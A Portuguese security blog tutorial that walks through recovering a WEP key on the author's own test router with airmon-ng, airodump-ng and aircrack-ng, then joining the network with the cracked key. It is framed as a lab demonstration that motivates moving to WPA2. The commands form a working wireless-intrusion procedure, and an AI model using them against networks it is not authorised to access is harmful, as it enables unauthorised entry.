Revelando a Chave WEP
0
0

Revelando a Chave WEP

Marcos Henrique
0 min
0
0
Email image

Revelar a chave WEP de um roteador Wireless é uma atividade simples de ser realizada, sabemos que há inúmeros roteadores de muitas empresas/residências com esta configuração, nosso papel como profissionais de segurança da informação é orientar para que seja realizada a alteração desta configuração para uma solução mais segura como WPA2 por exemplo.

Segue abaixo o passo a passo de como relevar uma chave WEP.

01 — Passo

Configurando o roteador Wireless.

Name (SSID): 100SECURITY
Channel: 6
Security: WEP (Wired Equivalent Privacy)
Passphrase: 123456
Key 1: AA8465E6A4

Email image

02 — Passo

Verificação da Interface wlan1.

ifconfig wlan1

Email image

03 — Passo

Listando todas as redes disponíveis.

iwlist scan

Email image

Resultado do Scan:

NMAC Address: 00:1F:33:22:5B:50
Channel: 6
ESSID:”100SECURITY”

Email image

04 — Passo

Iniciando o Modo Monitor do airmon-ng sobre a Interface wlan1.

airmon-ng start wlan1

Email image

Modo Monitor iniciado:

Observe que Modo Monitor da interface wlan1 foi habilitado para a interface mon0.

mon0 — Interface de rede que funciona de modo promíscuo.

Email image

05 — Passo

Utilizando o airodump-ng para capturar os dados.

airodump-ng –-ivs -w senha -c 6 mon0

airodump-ng : Programa utilizado para fazer o Dump dos pacotes.
–-ivs : Vetor de Inicialização.
-w : Define o prefixo do arquivo .ivs que será gerado ex.: ( senha-01.ivs ).
-c : Canal da Rede ex.: ( 6 ).
mon0 : Interface de rede que funciona de modo promíscuo.

Email image

06 — Passo

Monitorando a captura de dados.

Quando a coluna #Data ultrapassar 20.000 já se considera possível a quebra completa da chave.

No ex.: 21058 IVs foram capturados.

Email image

07 — Passo

Revelando a Chave WEP.

aircrack-ng -a 1 senha-01.ivs

aircrack-ng : Programa utilizado para quebra a senha dos IVs capturados
–a : Define o modo de ataque.
1 : Modo de ataque WEP.
senha-01.ivs : Arquivo gerado dos IVs capturados.

Email image

Chave Encontrada:

KEY FOUND! [ 0AA:84:65:E6:A4 ].
Chave: AA8465E6A4

Email image

08 — Passo

Editando e configurando o arquivo interfaces.

vim /etc/network/interfaces

Email image

auto wlan1
iface wlan1 inet dhcp
wireless-essid 100SECURITY
wireless-key AA8465E6A4

Email image

09 — Passo

Reiniciando as interfaces.

./etc/init.d/networking restart

Email image

Atribuição de IP via DHCP.
O IP 10.0.0.10 foi atribuído para a interface wlan1 através do roteador 10.0.0.1.

Email image

10 — Passo

Exibindo as definições da interface wlan1.

ESSID: “100SECURITY”
Encryption key: AA84–65E6-A4

iwconfig wlan1

Email image

Fonte: https://www.100security.com.br/wep